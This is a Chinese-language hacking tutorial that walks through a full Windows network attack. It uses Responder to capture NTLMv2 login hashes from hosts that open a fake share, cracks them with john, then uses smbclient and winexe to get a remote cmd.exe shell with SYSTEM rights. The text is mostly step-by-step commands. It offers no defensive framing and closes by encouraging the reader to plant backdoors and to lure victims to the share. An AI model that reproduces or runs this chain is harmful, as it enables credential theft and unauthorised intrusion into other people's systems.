这是一种不用通过漏洞利用来获取权限的一种方法,使用的是kali的一个工具,叫Responder,主要是通过监听网络,有人如果访问了虚假的共享文件地址,就会获得该系统登录口令的哈希值,然后再通过脚本进行hash爆破就可以获取口令,再通过ipc建立空连接获得系统权限。
我们的第一步当然是获取该工具喽,非常的简单,只要从github上下载即可,
当然首先你先需要安装一下python环境和git工具
# apt-get intall build-essential git python-dev
然后是直接从git上克隆到本地
# git clone https://github.com/lgandx/Responder.git
等他下载完成然后需要进行一下更新(如果存在更新的话)
# cd Respondder/
#git pull
会出现一个
Already up-to-date(以更新到最新)
然后我们就可以使用啦!
ok,那我们开始正文!
那些什么-h啥的就不废话了,不会有人真的不知道吧
首先我们启动一个内网监听(需要先cd到responder文件夹下)
# ./Responder.py -wf -I eth0
-wf 应该是设定web代理 -I 指定网卡,这里我指定的是eth0,我们可以通过ifconfig指令查看自己的ip以及网卡信息,具体怎么添加删除一个网卡这里不再赘述,scdn一搜一大堆
如下图,开始监听了。
然后我们在任何windows系统访问一下虚假的共享文件地址,
<******>\\NOTAREALHOST\NOTARALSHARE\notarealfile.exe
会出现拒绝访问
然后我们的监听端就会出现一些奇妙的信息。
没错,我们抓到了我们的登录口令hash
然后我们q退出,运行
./DumpHash.py
会把我们抓到的hash导出成john可以处理的格式
这里我们抓到了两个hash,一个是我本机的登录口令,一个是我的虚拟机windows server 2012R2的登录口令hash
我们的根目录会生成两个txt文件,分别存储的是两个版本的hash,具体是什么版本在我们上一步导出时已经明确指出,如上图:时NTLMV2版本。
然后我们用我们的john进行指定版本hash爆破,爆破并不是百分百成功的。
john DumpNTLMv2.txt
现在我们能做的只有等。。。
获取到口令之后我们能干的事情就太多了,看22端口开了嘛,开了直接ssh连接,或者还有更强的,验证目标系统上是否存在ipc共享,如下:
smbclient -U [username]%[password] -L [ipaddress]
ok可以清楚的看到它开着,然后我们直接用kali自带工具winexe拿shell
winexe -U [username]%[password] --uninstall \\[ipaddress] cmd.exe
或者直接给他提升系统权限
winexe -U [username]%[password] --uninstall --system \\[ipaddress] cmd.exe
注意一定要带参数–unistall 不然会留下你的大猪蹄子的哦
直接就是系统权限,该留后门留后门,该干嘛干嘛就完事了,一次愉快的旅程,*但是有个问题,怎么诱导它访问共享文件呢?that is a question。 *